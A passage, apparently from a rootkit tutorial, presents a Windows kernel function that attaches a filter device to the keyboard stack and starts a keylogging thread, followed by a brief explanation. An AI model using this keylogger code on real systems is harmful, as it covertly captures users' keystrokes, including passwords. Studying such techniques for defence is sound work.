Only the keyManager include statement and the function insertKeyboardFilter were added to filterManager.c:
#include "keyManager.h"NTSTATUS insertKeyboardFilter(PDRIVER_OBJECT pDriverObject, PDEVICE_OBJECT* ppOldDevice, PDEVICE_OBJECT* ppNewDevice, wchar_t* deviceName) { NTSTATUS status = STATUS_SUCCESS; UNICODE_STRING unicodeName = { 0 }; // Create a new device status = IoCreateDevice( pDriverObject, 0, NULL, FILE_DEVICE_KEYBOARD, 0, FALSE, ppNewDevice ); if( !NT_SUCCESS( status ) ) return status; // Initialize the new device ((PDEVICE_OBJECT)(*ppNewDevice))->Flags |= (DO_BUFFERED_IO | DO_POWER_PAGABLE); ((PDEVICE_OBJECT)(*ppNewDevice))->Flags &= ~DO_DEVICE_INITIALIZING; // Attach the new device RtlInitUnicodeString( &unicodeName, deviceName ); status = IoAttachDevice( *ppNewDevice, &unicodeName, ppOldDevice ); // Prevent unload if load failed if( !NT_SUCCESS( status ) ) { IoDeleteDevice( *ppNewDevice ); *ppNewDevice = NULL; } else { // Prepare the keylogging thread StartKeylogger( pDriverObject ); } return status; }
This function is very similar to the network filter insertion function, insertNetworkFilter. The new device is created as type FILE_DEVICE_KEYBOARD, and the flags are a bit different.